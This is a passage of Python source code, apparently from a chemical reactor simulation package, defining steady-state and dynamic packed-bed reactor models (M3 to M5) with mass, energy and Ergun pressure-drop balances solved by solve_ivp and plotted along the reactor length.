# interior nodes
Ci_b = max(SpCoi_z[i][z - 1], CONST.EPS_CONST)
# backward difference
dCdz = (Ci_c - Ci_b)/dz
# mass balance
dxdt_F = const_F1*(-SuGaVe*dCdz + ri[i])
dxdtMat[i][z] = dxdt_F
# energy balance (temperature) [K]
# temp [K]
T_c = T_z[z]
# check BC
if z == 0:
# BC1
T_b = T0
else:
# interior nodes
T_b = T_z[z - 1]
# backward difference
dTdz = (T_c - T_b)/dz
dxdt_T = const_T2*(-const_T1*dTdz + (-OvHeReT + Qm))
dxdtMat[indexT][z] = dxdt_T
# flat
dxdt = dxdtMat.flatten().tolist()
print("time: ", t)
return dxdt
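# NOTE
# editorial recap of the M2 discretization above (no new logic): backward
# differences over zNo nodes, dCdz = (Ci_c - Ci_b)/dz and dTdz = (T_c - T_b)/dz
# with the inlet values as the z = 0 boundary condition, so
#   dCi/dt = (1/BeVoFr)*(-SuGaVe*dCdz + ri[i])
#   dT/dt  = (-MoFl*Cp_mix*dTdz - OvHeReT + Qm)
#            / (CoSp*Cp_mix*BeVoFr + (1-BeVoFr)*CaDe*CaSpHeCa)
# while pressure is marched node-to-node through the Ergun relation.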
# NOTE
# steady-state homogeneous modeling
def runM3(self):
"""
M3 modeling case
steady-state modeling
not exactly plug-flow since dv/dz = 0 is assumed
unknowns: Ci, T, P
velocity is calculated from EOS considering feed Tf, Pf, Cf
"""
# NOTE
# start computation
start = timer()
# solver setting
solverConfig = self.modelInput['solver-config']
solverIVPSet = solverConfig['ivp']
# model info
modelId = self.modelInput['model']
# operating conditions
P = self.modelInput['operating-conditions']['pressure']
T = self.modelInput['operating-conditions']['temperature']
# reaction list
reactionDict = self.modelInput['reactions']
reactionList = rmtUtil.buildReactionList(reactionDict)
# reaction rate expression
reactionRateExpr = self.modelInput['reaction-rates']
# component list
compList = self.modelInput['feed']['components']['shell']
# graph label setting
labelList = compList.copy()
labelList.append("Temperature")
labelList.append("Pressure")
# component no
compNo = len(compList)
indexTemp = compNo
indexPressure = indexTemp + 1
# reactor spec
ReSpec = self.modelInput['reactor']
# reactor inner diameter [m]
ReInDi = ReSpec['ReInDi']
# reactor length [m]
ReLe = ReSpec['ReLe']
# cross-sectional area [m^2]
CrSeAr = CONST.PI_CONST*(ReInDi ** 2)/4
# particle diameter [m]
PaDi = ReSpec['PaDi']
## inlet values ##
# inlet volumetric flowrate at T,P [m^3/s]
VoFlRa0 = self.modelInput['feed']['volumetric-flowrate']
# REVIEW
# inlet species concentration [mol/m^3]
SpCoi0 = 1*np.array(self.modelInput['feed']['concentration'])
# inlet total concentration [mol/m^3]
SpCo0 = np.sum(SpCoi0)
# component molecular weight [g/mol]
MoWei = rmtUtil.extractCompData(self.internalData, "MW")
# external heat
ExHe = self.modelInput['external-heat']
# gas mixture viscosity [Pa.s]
GaMiVi = self.modelInput['feed']['mixture-viscosity']
# var no (Ci,T,P)
varNo = compNo + 2
# initial values
IV = np.zeros(varNo)
IV[0:compNo] = SpCoi0
IV[indexTemp] = T
IV[indexPressure] = P
# print(f"IV: {IV}")
# parameters
# component data
reactionListSorted = self.reactionListSorted
# reaction coefficient
reactionStochCoeff = self.reactionStochCoeffList
# standard heat of reaction at 25C [kJ/kmol]
StHeRe25 = np.array(
list(map(calStandardEnthalpyOfReaction, reactionList)))
# fun parameters
FunParam = {
"compList": compList,
"const": {
"CrSeAr": CrSeAr,
"MoWei": MoWei,
"StHeRe25": StHeRe25,
"GaMiVi": GaMiVi
},
"ReSpec": ReSpec,
"ExHe": ExHe,
"constBC1": {
"VoFlRa0": VoFlRa0,
"SpCoi0": SpCoi0,
"SpCo0": SpCo0,
"P0": P,
"T0": T
},
"reactionRateExpr": reactionRateExpr,
}
# save data
# timesNo = solverSetting['S3']['timesNo']
timesNo = solverSetting['M9']['zNo']
# time span
# t = (0.0, rea_L)
t = np.array([0, ReLe])
t_span = np.array([0, ReLe])
times = np.linspace(t_span[0], t_span[1], timesNo)
# tSpan = np.linspace(0, rea_L, 25)
# solver selection
# BDF, Radau, LSODA
solverIVP = "LSODA" if solverIVPSet == 'default' else solverIVPSet
# ode call
sol = solve_ivp(PackedBedReactorClass.modelEquationM3,
t, IV, method=solverIVP, t_eval=times, args=(reactionListSorted, reactionStochCoeff, FunParam))
# ode result
successStatus = sol.success
dataX = sol.t
# all results
dataYs = sol.y
# concentration [mol/m^3]
dataYs1 = sol.y[0:compNo, :]
labelListYs1 = labelList[0:compNo]
# REVIEW
# convert molar flowrate to mole fraction
# convert concentration to mole fraction
dataYs1_Ctot = np.sum(dataYs1, axis=0)
dataYs1_MoFri = dataYs1/dataYs1_Ctot
# temperature
dataYs2 = sol.y[indexTemp, :]
labelListYs3 = labelList[indexTemp]
# pressure
dataYs3 = sol.y[indexPressure, :]
# FIXME
# build matrix
_dataYs = np.concatenate(
(dataYs1_MoFri, [dataYs2]), axis=0)
# NOTE
# end of computation
end = timer()
elapsed = roundNum(end - start)
# plot info
plotTitle = f"Steady-State Modeling {modelId} with timesNo: {timesNo} within {elapsed}"
# check
if successStatus is True:
# plot setting: build (x,y) series
XYList = pltc.plots2DSetXYList(dataX, _dataYs)
# -> add label
dataList = pltc.plots2DSetDataList(XYList, labelList)
# datalists
dataLists = [dataList[0:compNo],
dataList[indexTemp]]
# select datalist
_dataListsSelected = selectFromListByIndex([0, -1], dataLists)
# subplot result
pltc.plots2DSub(_dataListsSelected, "Reactor Length (m)",
"Concentration (mol/m^3)", plotTitle)
# plot result
# pltc.plots2D(dataList[0:compNo], "Reactor Length (m)",
# "Concentration (mol/m^3)", "1D Plug-Flow Reactor")
# pltc.plots2D(dataList[indexFlux], "Reactor Length (m)",
# "Flux (kmol/m^2.s)", "1D Plug-Flow Reactor")
# pltc.plots2D(dataList[indexTemp], "Reactor Length (m)",
# "Temperature (K)", "1D Plug-Flow Reactor")
else:
_dataYs = []
XYList = []
dataList = []
# return
res = {
"dataYs": _dataYs,
"XYList": XYList,
"dataList": dataList
}
return res
def modelEquationM3(t, y, reactionListSorted, reactionStochCoeff, FunParam):
"""
M3 model
mass, energy, and momentum balance equations
modelParameters:
reactionListSorted: reactant/product and coefficient lists
reactionStochCoeff: reaction stoichiometric coefficient
FunParam:
compList: component list
const
CrSeAr: reactor cross sectional area [m^2]
MoWei: component molecular weight [g/mol]
StHeRe25: standard heat of reaction at 25C [kJ/kmol] | [J/mol]
GaMiVi: gas mixture viscosity [Pa.s]
ReSpec: reactor spec
ExHe: exchange heat spec
OvHeTrCo: overall heat transfer coefficient [J/m^2.s.K]
EfHeTrAr: effective heat transfer area [m^2]
MeTe: medium temperature [K]
reactionRateExpr: reaction rate expressions
"""
# fun params
# component symbol list
comList = FunParam['compList']
# const ->
const = FunParam['const']
# cross-sectional area [m^2]
CrSeAr = const['CrSeAr']
# component molecular weight [g/mol]
MoWei = const['MoWei']
# standard heat of reaction at 25C [kJ/kmol] | [J/mol]
StHeRe25 = const['StHeRe25']
# gas viscosity [Pa.s]
GaMiVi = const['GaMiVi']
# reactor spec ->
ReSpec = FunParam['ReSpec']
# bed void fraction - porosity
BeVoFr = ReSpec['BeVoFr']
# bulk density (catalyst bed density)
CaBeDe = ReSpec['CaBeDe']
# particle diameter [m]
PaDi = ReSpec['PaDi']
# exchange heat spec ->
ExHe = FunParam['ExHe']
# boundary conditions constants
constBC1 = FunParam['constBC1']
## inlet values ##
# inlet volumetric flowrate at T,P [m^3/s]
VoFlRa0 = constBC1['VoFlRa0']
# inlet species concentration [mol/m^3]
SpCoi0 = constBC1['SpCoi0']
# inlet total concentration [mol/m^3]
SpCo0 = constBC1['SpCo0']
# inlet pressure [Pa]
P0 = constBC1['P0']
# inlet temperature [K]
T0 = constBC1['T0']
# reaction rate expressions
reactionRateExpr = FunParam['reactionRateExpr']
# using equation
varisSet = reactionRateExpr['VARS']
ratesSet = reactionRateExpr['RATES']
# calculate
# molar flowrate [kmol/s]
MoFlRa0 = SpCo0*VoFlRa0
# interstitial gas velocity [m/s]
InGaVe0 = VoFlRa0/(CrSeAr*BeVoFr)
# superficial gas velocity [m/s]
SuGaVe0 = InGaVe0*BeVoFr
# components no
# y: component molar flowrate, total molar flux, temperature, pressure
compNo = len(comList)
indexT = compNo
indexP = indexT + 1
# concentration species [mol/m^3]
CoSpi = y[0:compNo]
# temperature [K]
T = y[indexT]
# pressure [Pa]
P = y[indexP]
# total concentration [mol/m^3]
CoSp = np.sum(CoSpi)
# mole fraction
MoFri = np.array(
rmtUtil.moleFractionFromConcentrationSpecies(CoSpi))
# gas velocity based on interstitial velocity [m/s]
InGaVe = rmtUtil.calGaVeFromEOS(InGaVe0, SpCo0, CoSp, P0, P)
# superficial gas velocity [m/s]
SuGaVe = InGaVe*BeVoFr
# total flowrate [mol/s]
# [mol/m^3]*[m/s]*[m^2]
MoFlRa = CoSp*SuGaVe*CrSeAr
# molar flowrate list [mol/s]
MoFlRai = MoFlRa*MoFri
# FIXME
# molar flux [mol/m^2.s]
MoFl = MoFlRa/CrSeAr
# volumetric flowrate [m^3/s]
VoFlRai = calVolumetricFlowrateIG(P, T, MoFlRai)
# mixture molecular weight [kg/mol]
MiMoWe = rmtUtil.mixtureMolecularWeight(MoFri, MoWei, "kg/mol")
# gas density [kg/m^3]
GaDe = calDensityIG(MiMoWe, CoSp)
GaDeEOS = calDensityIGFromEOS(P, T, MiMoWe)
# NOTE
# momentum equation
# REVIEW
# ergun equation
ergA = 150*GaMiVi*SuGaVe/(PaDi**2)
ergB = ((1-BeVoFr)**2)/(BeVoFr**3)
ergC = 1.75*GaDe*(SuGaVe**2)/PaDi
ergD = (1-BeVoFr)/(BeVoFr**3)
RHS_ergun = -1*(ergA*ergB + ergC*ergD)
# NOTE
# kinetics
# component formation rate [mol/m^3.s]
# conversion
# FIXME
# Ri = 1000*np.array(PackedBedReactorClass.modelReactions(
# P, T, MoFri, CaBeDe))
# loop
loopVars0 = (T, P, MoFri, CoSpi)
# check unit
r0 = np.array(reactionRateExe(
loopVars0, varisSet, ratesSet))
# loop
Ri = r0
# component formation rate [mol/m^3.s]
# rf[mol/kgcat.s]*CaBeDe[kgcat/m^3]
# call [mol/m^3.s]
ri = componentFormationRate(
compNo, comList, reactionStochCoeff, Ri)
# overall formation rate [mol/m^3.s]
OvR = np.sum(ri)
# enthalpy
# heat capacity at constant pressure of mixture Cp [kJ/kmol.K] | [J/mol.K]
# Cp mean list
CpMeanList = calMeanHeatCapacityAtConstantPressure(comList, T)
# print(f"Cp mean list: {CpMeanList}")
# Cp mixture
CpMeanMixture = calMixtureHeatCapacityAtConstantPressure(
MoFri, CpMeanList)
# print(f"Cp mean mixture: {CpMeanMixture}")
# enthalpy change from Tref to T [kJ/kmol] | [J/mol]
# enthalpy change
EnChList = np.array(calEnthalpyChangeOfReaction(reactionListSorted, T))
# heat of reaction at T [kJ/kmol] | [J/mol]
HeReT = np.array(EnChList + StHeRe25)
# overall heat of reaction [J/m^3.s]
OvHeReT = np.dot(Ri, HeReT)
# NOTE
#
# cooling temperature [K]
Tm = ExHe['MeTe']
# overall heat transfer coefficient [J/s.m2.K]
U = ExHe['OvHeTrCo']
# heat transfer area over volume [m2/m3]
a = ExHe['EfHeTrAr']
# heat transfer parameter [W/m^3.K] | [J/s.m^3.K]
Ua = U*a
# external heat [J/m^3.s]
Qm = Ua*(Tm - T)
# NOTE
# diff/dt
dxdt = []
# loop vars
const_C1 = 1/SuGaVe
const_T1 = 1/(MoFl*CpMeanMixture)
# mass balance (concentration) [mol/m^3]
for i in range(compNo):
dxdt_Ci = const_C1*ri[i]
dxdt.append(dxdt_Ci)
# energy balance (temperature) [K]
dxdt_T = const_T1*(-OvHeReT + Qm)
dxdt.append(dxdt_T)
# momentum balance (ergun equation)
dxdt_P = RHS_ergun
dxdt.append(dxdt_P)
return dxdt
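# NOTE
# editorial recap of the M3 steady-state balances above (no new logic):
#   dCi/dz = ri[i]/SuGaVe
#   dT/dz  = (-OvHeReT + Qm)/(MoFl*Cp_mix)
#   dP/dz  = RHS_ergun
# with the gas velocity updated from the EOS (calGaVeFromEOS) at each step
# rather than treated as an unknown.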
# NOTE
# steady-state homogeneous modeling
def runM4(self):
"""
M4 modeling case
steady-state modeling
unknowns: Ci,P,T,v
CT and GaDe are calculated from EOS
"""
# operating conditions
P = self.modelInput['operating-conditions']['pressure']
T = self.modelInput['operating-conditions']['temperature']
# reaction list
reactionDict = self.modelInput['reactions']
reactionList = rmtUtil.buildReactionList(reactionDict)
# component list
compList = self.modelInput['feed']['components']['shell']
# graph label setting
labelList = compList.copy()
labelList.append("Temperature")
labelList.append("Pressure")
labelList.append("Velocity")
# component no
compNo = len(compList)
indexTemp = compNo
indexPressure = indexTemp + 1
indexVelocity = indexPressure + 1
indexDensity = indexVelocity + 1
# reactor spec
ReSpec = self.modelInput['reactor']
# reactor inner diameter [m]
ReInDi = ReSpec['ReInDi']
# reactor length [m]
ReLe = ReSpec['ReLe']
# cross-sectional area [m^2]
CrSeAr = CONST.PI_CONST*(ReInDi ** 2)/4
# particle diameter [m]
PaDi = ReSpec['PaDi']
## inlet values ##
# inlet volumetric flowrate at T,P [m^3/s]
VoFlRa0 = self.modelInput['feed']['volumetric-flowrate']
# inlet species concentration [mol/m^3]
SpCoi0 = np.array(self.modelInput['feed']['concentration'])
# inlet total concentration [mol/m^3]
SpCo0 = np.sum(SpCoi0)
# inlet superficial velocity [m/s]
SuGaVe0 = self.modelInput['feed']['superficial-velocity']
# mole fraction
MoFri = np.array(
rmtUtil.moleFractionFromConcentrationSpecies(SpCoi0))
# component molecular weight [g/mol]
MoWei = rmtUtil.extractCompData(self.internalData, "MW")
# external heat
ExHe = self.modelInput['external-heat']
# gas mixture viscosity [Pa.s]
GaMiVi = self.modelInput['feed']['mixture-viscosity']
# mixture molecular weight [kg/mol]
MiMoWe = rmtUtil.mixtureMolecularWeight(MoFri, MoWei, "kg/mol")
# inlet density [kg/m^3]
GaDe0 = MiMoWe*SpCo0
# var no Ci,T,P,v)
varNo = compNo + 3
# initial values
IV = np.zeros(varNo)
IV[0:compNo] = SpCoi0
IV[indexTemp] = T
IV[indexPressure] = P
IV[indexVelocity] = SuGaVe0
# print(f"IV: {IV}")
# parameters
# component data
reactionListSorted = self.reactionListSorted
# reaction coefficient
reactionStochCoeff = self.reactionStochCoeffList
# standard heat of reaction at 25C [kJ/kmol]
StHeRe25 = np.array(
list(map(calStandardEnthalpyOfReaction, reactionList)))
# fun parameters
FunParam = {
"compList": compList,
"const": {
"CrSeAr": CrSeAr,
"MoWei": MoWei,
"StHeRe25": StHeRe25,
"GaMiVi": GaMiVi
},
"ReSpec": ReSpec,
"ExHe": ExHe,
"constBC1": {
"VoFlRa0": VoFlRa0,
"SpCoi0": SpCoi0,
"SpCo0": SpCo0,
"P0": P,
"T0": T
}
}
# save data
timesNo = solverSetting['S3']['timesNo']
# time span
# t = (0.0, rea_L)
t = np.array([0, ReLe])
t_span = np.array([0, ReLe])
times = np.linspace(t_span[0], t_span[1], timesNo)
# tSpan = np.linspace(0, rea_L, 25)
# ode call
sol = solve_ivp(PackedBedReactorClass.modelEquationM4,
t, IV, method="LSODA", t_eval=times, args=(reactionListSorted, reactionStochCoeff, FunParam))
# ode result
successStatus = sol.success
dataX = sol.t
# all results
dataYs = sol.y
# concentration [mol/m^3]
dataYs1 = sol.y[0:compNo, :]
labelListYs1 = labelList[0:compNo]
# REVIEW
# convert concentration to mole fraction
dataYs1_Ctot = np.sum(dataYs1, axis=0)
dataYs1_MoFri = dataYs1/dataYs1_Ctot
# temperature [K]
dataYs2 = sol.y[indexTemp, :]
labelListYs3 = labelList[indexTemp]
# pressure [Pa]
dataYs3 = sol.y[indexPressure, :]
# velocity [m/s]
dataYs4 = sol.y[indexVelocity, :]
# FIXME
# build matrix
_dataYs = np.concatenate(
(dataYs1_MoFri, [dataYs2]), axis=0)
_dataYsPlot = np.concatenate(
(dataYs1_MoFri, [dataYs2], [dataYs3], [dataYs4]), axis=0)
# plot info
plotTitle = f"Steady-State Modeling [M4] with timesNo: {timesNo}"
# NOTE
# # steady-state result
# # txt
# # ssModelingResult = np.loadtxt('ssModeling.txt', dtype=np.float64)
# # binary
# ssModelingResult = np.load('ResM1.npy')
# # ssdataXs = np.linspace(0, ReLe, zNo)
# ssXYList = pltc.plots2DSetXYList(dataX, ssModelingResult)
# ssdataList = pltc.plots2DSetDataList(ssXYList, labelList)
# # datalists
# ssdataLists = [ssdataList[0:compNo],
# ssdataList[indexTemp]]
# check
if successStatus is True:
# plot setting: build (x,y) series
XYList = pltc.plots2DSetXYList(dataX, _dataYsPlot)
# -> add label
dataList = pltc.plots2DSetDataList(XYList, labelList)
# datalists
dataLists = [dataList[0:compNo],
dataList[indexTemp], dataList[indexPressure], dataList[indexVelocity]]
# select datalist
_dataListsSelected = selectFromListByIndex([0, -3], dataLists)
# subplot result
pltc.plots2DSub(_dataListsSelected, "Reactor Length (m)",
"Concentration (mol/m^3)", plotTitle)
else:
_dataYs = []
XYList = []
dataList = []
# return
res = {
"dataYs": _dataYs,
"XYList": XYList,
"dataList": dataList
}
return res
def modelEquationM4(t, y, reactionListSorted, reactionStochCoeff, FunParam):
"""
M4 model
mass, energy, and momentum balance equations
modelParameters:
reactionListSorted: reactant/product and coefficient lists
reactionStochCoeff: reaction stoichiometric coefficient
FunParam:
compList: component list
const
CrSeAr: reactor cross sectional area [m^2]
MoWei: component molecular weight [g/mol]
StHeRe25: standard heat of reaction at 25C [kJ/kmol] | [J/mol]
GaMiVi: gas mixture viscosity [Pa.s]
ReSpec: reactor spec
ExHe: exchange heat spec
OvHeTrCo: overall heat transfer coefficient [J/m^2.s.K]
EfHeTrAr: effective heat transfer area [m^2]
MeTe: medium temperature [K]
"""
# fun params
# component symbol list
comList = FunParam['compList']
# const ->
const = FunParam['const']
# cross-sectional area [m^2]
CrSeAr = const['CrSeAr']
# component molecular weight [g/mol]
MoWei = const['MoWei']
# standard heat of reaction at 25C [kJ/kmol] | [J/mol]
StHeRe25 = const['StHeRe25']
# gas viscosity [Pa.s]
GaMiVi = const['GaMiVi']
# reactor spec ->
ReSpec = FunParam['ReSpec']
# bed void fraction - porosity
BeVoFr = ReSpec['BeVoFr']
# bulk density (catalyst bed density)
CaBeDe = ReSpec['CaBeDe']
# particle diameter [m]
PaDi = ReSpec['PaDi']
# exchange heat spec ->
ExHe = FunParam['ExHe']
# boundary conditions constants
constBC1 = FunParam['constBC1']
## inlet values ##
# inlet volumetric flowrate at T,P [m^3/s]
VoFlRa0 = constBC1['VoFlRa0']
# inlet species concentration [kmol/m^3]
SpCoi0 = constBC1['SpCoi0']
# inlet total concentration [kmol/m^3]
SpCo0 = constBC1['SpCo0']
# inlet pressure [Pa]
P0 = constBC1['P0']
# inlet temperature [K]
T0 = constBC1['T0']
# calculate
# molar flowrate [kmol/s]
MoFlRa0 = SpCo0*VoFlRa0
# interstitial gas velocity [m/s]
InGaVe0 = VoFlRa0/(CrSeAr*BeVoFr)
# superficial gas velocity [m/s]
SuGaVe0 = InGaVe0*BeVoFr
# components no
# y: component molar flowrate, total molar flux, temperature, pressure
compNo = len(comList)
indexT = compNo
indexP = indexT + 1
indexVelocity = indexP + 1
# concentration species [mol/m^3]
CoSpi = y[0:compNo]
# temperature [K]
T = y[indexT]
# pressure [Pa]
P = y[indexP]
# velocity
SuGaVe = y[indexVelocity]
# total concentration [mol/m^3]
CoSp = np.sum(CoSpi)
# mole fraction
MoFri = np.array(
rmtUtil.moleFractionFromConcentrationSpecies(CoSpi))
# gas velocity based on interstitial velocity [m/s]
# InGaVe = rmtUtil.calGaVeFromEOS(InGaVe0, SpCo0, CoSp, P0, P)
# superficial gas velocity [m/s]
# SuGaVe = InGaVe*BeVoFr
# total flowrate [mol/s]
# [mol/m^3]*[m/s]*[m^2]
MoFlRa = CoSp*SuGaVe*CrSeAr
# molar flowrate list [mol/s]
MoFlRai = MoFlRa*MoFri
# molar flux [mol/m^2.s]
MoFl = MoFlRa/CrSeAr
# volumetric flowrate [m^3/s]
VoFlRai = calVolumetricFlowrateIG(P, T, MoFlRai)
# mixture molecular weight [kg/mol]
MiMoWe = rmtUtil.mixtureMolecularWeight(MoFri, MoWei, "kg/mol")
# gas density [kg/m^3]
GaDe = calDensityIG(MiMoWe, CoSp)
# GaDeEOS = calDensityIGFromEOS(P, T, MiMoWe)
# NOTE
# momentum equation
# REVIEW
# ergun equation
ergA = 150*GaMiVi*SuGaVe/(PaDi**2)
ergB = ((1-BeVoFr)**2)/(BeVoFr**3)
ergC = 1.75*GaDe*(SuGaVe**2)/PaDi
ergD = (1-BeVoFr)/(BeVoFr**3)
RHS_ergun = -1*(ergA*ergB + ergC*ergD)
# NOTE
# kinetics
# component formation rate [mol/m^3.s]
# conversion
# FIXME
Ri = 1000*np.array(PackedBedReactorClass.modelReactions(
P, T, MoFri, CaBeDe))
# component formation rate [mol/m^3.s]
# rf[mol/kgcat.s]*CaBeDe[kgcat/m^3]
ri = np.zeros(compNo)
for k in range(compNo):
# reset
_riLoop = 0
for m in range(len(reactionStochCoeff)):
for n in range(len(reactionStochCoeff[m])):
if comList[k] == reactionStochCoeff[m][n][0]:
_riLoop += reactionStochCoeff[m][n][1]*Ri[m]
ri[k] = _riLoop
# overall formation rate [mol/m^3.s]
OvR = np.sum(ri)
# enthalpy
# heat capacity at constant pressure of mixture Cp [kJ/kmol.K] | [J/mol.K]
# Cp mean list
CpMeanList = calMeanHeatCapacityAtConstantPressure(comList, T)
# print(f"Cp mean list: {CpMeanList}")
# Cp mixture
CpMeanMixture = calMixtureHeatCapacityAtConstantPressure(
MoFri, CpMeanList)
# print(f"Cp mean mixture: {CpMeanMixture}")
# enthalpy change from Tref to T [kJ/kmol] | [J/mol]
# enthalpy change
EnChList = np.array(calEnthalpyChangeOfReaction(reactionListSorted, T))
# heat of reaction at T [kJ/kmol] | [J/mol]
HeReT = np.array(EnChList + StHeRe25)
# overall heat of reaction [J/m^3.s]
OvHeReT = np.dot(Ri, HeReT)
# NOTE
#
# cooling temperature [K]
Tm = ExHe['MeTe']
# overall heat transfer coefficient [J/s.m2.K]
U = ExHe['OvHeTrCo']
# heat transfer area over volume [m2/m3]
a = ExHe['EfHeTrAr']
# heat transfer parameter [W/m^3.K] | [J/s.m^3.K]
Ua = U*a
# external heat [J/m^3.s]
Qm = Ua*(Tm - T)
# REVIEW
# subs df/dt
# NOTE
# diff/dt
dxdt = []
# loop vars
const_C1 = 1/SuGaVe
const_T1 = 1/(MoFl*CpMeanMixture)
const_V1 = 1/CoSp
# RHS of ODE
# energy balance
dxdt_T = const_T1*(-OvHeReT + Qm)
# momentum balance (ergun eq.)
dxdt_P = RHS_ergun
# velocity from global concentration
dxdt_v = const_V1*((-SuGaVe/CONST.R_CONST) *
((1/T)*dxdt_P - (P/T**2)*dxdt_T) + OvR)
# mass balance (concentration) [mol/m^3]
for i in range(compNo):
dxdt_Ci = const_C1*(-CoSpi[i]*dxdt_v + ri[i])
dxdt.append(dxdt_Ci)
# energy balance (temperature) [K]
# dxdt_T = const_T1*(-OvHeReT + Qm)
dxdt.append(dxdt_T)
# momentum balance (ergun equation)
# dxdt_P = RHS_ergun
dxdt.append(dxdt_P)
# velocity [m/s]
dxdt.append(dxdt_v)
return dxdt
# NOTE
# dynamic homogeneous modeling
def runM5(self):
"""
M5 modeling case
dynamic model
unknowns: Ci, T (dynamic), P, v (static)
CT, GaDe = f(P, T, n)
"""
# start computation
start = timer()
# solver setting
solverConfig = self.modelInput['solver-config']
solverIVPSet = solverConfig['ivp']
# operating conditions
P = self.modelInput['operating-conditions']['pressure']
T = self.modelInput['operating-conditions']['temperature']
# operation time [s]
opT = self.modelInput['operating-conditions']['period']
# reaction list
reactionDict = self.modelInput['reactions']
reactionList = rmtUtil.buildReactionList(reactionDict)
# number of reactions
reactionListNo = len(reactionList)
# component list
compList = self.modelInput['feed']['components']['shell']
# graph label setting
labelList = compList.copy()
labelList.append("Temperature")
# labelList.append("Pressure")
# component no
compNo = len(compList)
indexTemp = compNo
indexPressure = indexTemp + 1
indexVelocity = indexPressure + 1
# reactor spec
ReSpec = self.modelInput['reactor']
# reactor inner diameter [m]
ReInDi = ReSpec['ReInDi']
# reactor length [m]
ReLe = ReSpec['ReLe']
# cross-sectional area [m^2]
CrSeAr = CONST.PI_CONST*(ReInDi ** 2)/4
# particle diameter [m]
PaDi = ReSpec['PaDi']
# bed void fraction - porosity
BeVoFr = ReSpec['BeVoFr']
## inlet values ##
# inlet volumetric flowrate at T,P [m^3/s]
VoFlRa0 = self.modelInput['feed']['volumetric-flowrate']
# inlet species concentration [kmol/m^3]
SpCoi0 = np.array(self.modelInput['feed']['concentration'])
# inlet total concentration [kmol/m^3]
SpCo0 = np.sum(SpCoi0)
# inlet superficial velocity [m/s]
SuGaVe0 = self.modelInput['feed']['superficial-velocity']
# reaction rate expression
reactionRateExpr = self.modelInput['reaction-rates']
# component molecular weight [g/mol]
MoWei = rmtUtil.extractCompData(self.internalData, "MW")
# external heat
ExHe = self.modelInput['external-heat']
# gas mixture viscosity [Pa.s]
GaMiVi = self.modelInput['feed']['mixture-viscosity']
# finite difference points in the z direction
zNo = solverSetting['S2']['zNo']
# length list
dataXs = np.linspace(0, ReLe, zNo)
# element size - dz [m]
dz = ReLe/(zNo-1)
# var no (Ci,T)
varNo = compNo + 1
# concentration var no
varNoCon = compNo*zNo
# temperature var no
varNoTemp = 1*zNo
# total var no along the reactor length
varNoT = varNo*zNo
# initial values at t = 0 and z >> 0
IVMatrixShape = (varNo, zNo)
IV2D = np.zeros(IVMatrixShape)
# initialize IV2D
# -> concentration [kmol/m^3]
for i in range(compNo):
for j in range(zNo):
IV2D[i][j] = SpCoi0[i]
for j in range(zNo):
IV2D[indexTemp][j] = T
# flatten IV
IV = IV2D.flatten()
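# row-major flattening: the state vector holds all zNo nodes of component 1,
# then component 2, ..., and finally the zNo temperature nodes
# (the same ordering is assumed when reshaping inside modelEquationM5)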
# print(f"IV: {IV}")
# parameters
# component data
reactionListSorted = self.reactionListSorted
# reaction coefficient
reactionStochCoeff = self.reactionStochCoeffList
# standard heat of reaction at 25C [kJ/kmol]
StHeRe25 = np.array(
list(map(calStandardEnthalpyOfReaction, reactionList)))
# fun parameters
FunParam = {
"compList": compList,
"const": {
"CrSeAr": CrSeAr,
"MoWei": MoWei,
"StHeRe25": StHeRe25,
"GaMiVi": GaMiVi,
"zNo": zNo,
"varNo": varNo,
"varNoT": varNoT,
"reactionListNo": reactionListNo,
"dz": dz
},
"ReSpec": ReSpec,
"ExHe": ExHe,
"constBC1": {
"VoFlRa0": VoFlRa0,
"SpCoi0": SpCoi0,
"SpCo0": SpCo0,
"P0": P,
"T0": T,
"SuGaVe0": SuGaVe0
},
"reactionRateExpr": reactionRateExpr
}
# time span
tNo = solverSetting['S2']['tNo']
opTSpan = np.linspace(0, opT, tNo + 1)
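# the operating period is split into tNo sub-intervals; solve_ivp is called once per
# interval and the end state of each call becomes the initial value of the next one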
# save data
timesNo = solverSetting['S2']['timesNo']
# result
dataPack = []
# build data list
# over time
dataPacktime = np.zeros((varNo, tNo, zNo))
#
# solver selection
# BDF, Radau, LSODA
solverIVP = "LSODA" if solverIVPSet == 'default' else solverIVPSet
# time loop
for i in range(tNo):
# set time span
t = np.array([opTSpan[i], opTSpan[i+1]])
times = np.linspace(t[0], t[1], timesNo)
print(f"time: {t} seconds")
# ode call
sol = solve_ivp(PackedBedReactorClass.modelEquationM5,
t, IV, method=solverIVP, t_eval=times, args=(reactionListSorted, reactionStochCoeff, FunParam))
# ode result
successStatus = sol.success
# check
if successStatus is False:
raise RuntimeError("ODE solver failed for the current time interval")
# time interval
dataTime = sol.t
# all results
dataYs = sol.y
# component concentration [kmol/m^3]
dataYs1 = dataYs[0:varNoCon, -1]
# 2d matrix
dataYs1_Reshaped = np.reshape(dataYs1, (compNo, zNo))
# REVIEW
# convert concentration to mole fraction
dataYs1_Ctot = np.sum(dataYs1_Reshaped, axis=0)
dataYs1_MoFri = dataYs1_Reshaped/dataYs1_Ctot
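# broadcasting: each component row is divided by the node-wise total concentration,
# giving mole fraction profiles along the reactor length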
# temperature - 2d matrix
dataYs2 = np.array([dataYs[varNoCon:varNoT, -1]])
# combine
_dataYs = np.concatenate((dataYs1_MoFri, dataYs2), axis=0)
# save data
dataPack.append({
"successStatus": successStatus,
"dataTime": dataTime[-1],
"dataYCons": dataYs1_Reshaped,
"dataYTemp": dataYs2,
"dataYs": _dataYs
})
for m in range(varNo):
# var list
dataPacktime[m][i, :] = dataPack[i]['dataYs'][m, :]
# update initial values [IV]
IV = dataYs[:, -1]
# NOTE
# end of computation
end = timer()
elapsed = roundNum(end - start)
# NOTE
# steady-state result
# txt
# ssModelingResult = np.loadtxt('ssModeling.txt', dtype=np.float64)
# binary
# ssModelingResult = np.load('ResM1.npy')
# ssdataXs = np.linspace(0, ReLe, zNo)
# ssXYList = pltc.plots2DSetXYList(dataXs, ssModelingResult)
# ssdataList = pltc.plots2DSetDataList(ssXYList, labelList)
# datalists
# ssdataLists = [ssdataList[0:compNo],
# ssdataList[indexTemp]]
# subplot result
# pltc.plots2DSub(ssdataLists, "Reactor Length (m)",
# "Concentration (mol/m^3)", "1D Plug-Flow Reactor")
# plot info
plotTitle = f"Dynamic Modeling for opT: {opT} with zNo: {zNo}, tNo: {tNo} within {elapsed} seconds"
# REVIEW
# display result at specific time
for i in range(tNo):
# var list
_dataYs = dataPack[i]['dataYs']
# plot setting: build (x,y) series
XYList = pltc.plots2DSetXYList(dataXs, _dataYs)
# -> add label
dataList = pltc.plots2DSetDataList(XYList, labelList)
# datalists
dataLists = [dataList[0:compNo],
dataList[indexTemp]]
if i == tNo-1:
# subplot result
